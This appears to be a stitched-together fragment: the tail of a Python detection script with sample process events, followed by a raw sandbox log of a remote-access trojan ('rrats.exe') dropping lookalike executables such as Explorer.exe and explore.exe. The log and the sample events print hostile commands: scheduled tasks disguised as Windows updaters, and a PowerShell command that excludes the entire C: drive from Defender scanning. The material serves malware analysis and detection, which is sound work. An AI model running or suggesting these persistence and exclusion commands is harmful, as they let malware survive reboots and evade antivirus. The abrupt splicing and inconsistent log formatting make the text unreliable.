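          r'/tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"'),
    Event(r"C:\Users\user\AppData\Roaming\Explorer.exe", "unknown",
          r'"C:\Users\user\AppData\Roaming\Explorer.exe"'),
    Event(r"C:\Users\user\AppData\Local\explore.exe", "unknown",
          r"C:\Users\user\AppData\Local\explore.exe"),
    Event(r"C:\Windows\SysWOW64\schtasks.exe", CMD32,
          r'schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" '
          r'/tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"'),
    Event(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.detail}")
```

Map real Sysmon Event ID 1 or Security 4688 records onto Event and feed them to scan(); on the sample above the eight rows produce nine findings and the benign cmd.exe /c dir row produces none. The rules are deliberately narrow (the lookalike check only catches one-character deletions such as explore.exe) and are triage leads, not verdicts: the second schedtask row fires twice, once as persistence and once as an exclusion, which is exactly the pairing this sample relies on.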
                        Source: C:\Users\user\Desktop\rrats.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\a.bat" "Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe a.exe -p1234Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' & exitJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE75F.tmp.bat""Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"' Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Explorer.exe "C:\Users\user\AppData\Roaming\Explorer.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Cschtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdate" /tr "C:\Users\user\AppData\Local\explore.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc ONIDLE /i 1 /rl highest /tn "Windows\WinUpdaters" /tr "cmd.exe /C powershell Add-MpPreference -ExclusionPath C:\"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:"
Source: C:\Users\user\Desktop\rrats.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, coremessaging.dll, wintypes.dll, wintypes.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, windows.fileexplorer.common.dll, apphelp.dll, ntshrui.dll, cscapi.dll, linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-synch-l1-2-0.dll, api-ms-win-core-fibers-l1-1-1.dll, api-ms-win-core-localization-l1-2-1.dll, version.dll, dxgidebug.dll, sfc_os.dll, sspicli.dll, rsaenh.dll, uxtheme.dll, dwmapi.dll, cryptbase.dll, riched20.dll, usp10.dll, msls31.dll, kernel.appcore.dll, dpapi.dll, windowscodecs.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wintypes.dll, wintypes.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll, pcacli.dll, mpr.dll, windows.fileexplorer.common.dll, ntshrui.dll, cscapi.dll, msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, uxtheme.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: rasman.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: schannel.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: version.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\explore.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\rrats.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: rrats.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: rrats.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: rrats.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: rrats.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: rrats.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: rrats.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: rrats.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: rrats.exe
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: rrats.exe, 00000000.00000003.2025471553.0000000007875000.00000004.00000020.00020000.00000000.sdmp, a.exe, 00000004.00000000.2030069537.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp, a.exe, 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmp, a.exe.0.dr
                        Source: rrats.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: rrats.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: rrats.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: rrats.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: rrats.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\rrats.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6344500
                        Source: Explorer.exe.5.dr | Static PE information: real checksum: 0x0 should be: 0x18937
                        Source: a.exe.0.dr | Static PE information: real checksum: 0x50eb0 should be: 0x5acc5
                        Source: rrat.exe.4.dr | Static PE information: real checksum: 0x0 should be: 0x18937
                        Source: explore.exe.16.dr | Static PE information: real checksum: 0x0 should be: 0x18937
                        Source: rrats.exe | Static PE information: real checksum: 0x4fdb3 should be: 0x886c1
                        Source: rrats.exe | Static PE information: section name: .didat
                        Source: a.exe.0.dr | Static PE information: section name: .didat
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBD443 push FFFFFFD0h; retf 0_2_00CBD445
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBF640 push ecx; ret 0_2_00CBF653
                        Source: C:\Users\user\Desktop\rrats.exe | Code function: 0_2_00CBEB78 push eax; ret 0_2_00CBEB96
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_3_02FB485A push eax; retf 4_3_02FB488D
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E93A94 push eax; ret 4_2_00E93AB2
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Code function: 4_2_00E947D0 push ecx; ret 4_2_00E947E3
                        Source: rrat.exe.4.dr, rIsDkswHsqEa.cs | High entropy of concatenated method names: 'bEXarVuKQzAhOus', 'KZMgyydrmWaa', 'fZFJNQMngFoEAwE', 'GrDQmWWEvDEvbiZVB', 'gnljKRkooXxGi', 'IVGTCPMGlMs', 'EpqmIhkFeAF', 'YleZeIYkYW', 'AbYVWBHerNIoy', 'lFfOfPSqLDq'
                        Source: Explorer.exe.5.dr, rIsDkswHsqEa.cs | High entropy of concatenated method names: 'bEXarVuKQzAhOus', 'KZMgyydrmWaa', 'fZFJNQMngFoEAwE', 'GrDQmWWEvDEvbiZVB', 'gnljKRkooXxGi', 'IVGTCPMGlMs', 'EpqmIhkFeAF', 'YleZeIYkYW', 'AbYVWBHerNIoy', 'lFfOfPSqLDq'
                        Source: 5.2.rrat.exe.26db1a0.0.raw.unpack, rIsDkswHsqEa.cs | High entropy of concatenated method names: 'bEXarVuKQzAhOus', 'KZMgyydrmWaa', 'fZFJNQMngFoEAwE', 'GrDQmWWEvDEvbiZVB', 'gnljKRkooXxGi', 'IVGTCPMGlMs', 'EpqmIhkFeAF', 'YleZeIYkYW', 'AbYVWBHerNIoy', 'lFfOfPSqLDq'
                        Source: explore.exe.16.dr, rIsDkswHsqEa.cs | High entropy of concatenated method names: 'bEXarVuKQzAhOus', 'KZMgyydrmWaa', 'fZFJNQMngFoEAwE', 'GrDQmWWEvDEvbiZVB', 'gnljKRkooXxGi', 'IVGTCPMGlMs', 'EpqmIhkFeAF', 'YleZeIYkYW', 'AbYVWBHerNIoy', 'lFfOfPSqLDq'

                        Persistence and Installation Behavior

                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | File created: C:\Users\user\AppData\Roaming\Explorer.exe
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                        Source: C:\Users\user\Desktop\rrats.exe | File created: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | File created: C:\Users\user\AppData\Local\explore.exe

                        Boot Survival

                        Source: Yara match | File source: 5.0.rrat.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.rrat.exe.26db1a0.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 5.2.rrat.exe.26db1a0.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000000.2033237516.0000000000202000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000002.2089096502.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000005.00000002.2089096502.00000000026D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: a.exe PID: 1372, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: rrat.exe PID: 1968, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: Explorer.exe PID: 7356, type: MEMORYSTR
                        Source: Yara match | File source: C:\Users\user\AppData\Local\explore.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, type: DROPPED
                        Source: Yara match | File source: C:\Users\user\AppData\Roaming\Explorer.exe, type: DROPPED
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows\WindowsUpdater" /tr '"C:\Users\user\AppData\Roaming\Explorer.exe"'

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                        Source: C:\Users\user\AppData\Roaming\Explorer.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                        Source: C:\Users\user\Desktop\rrats.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
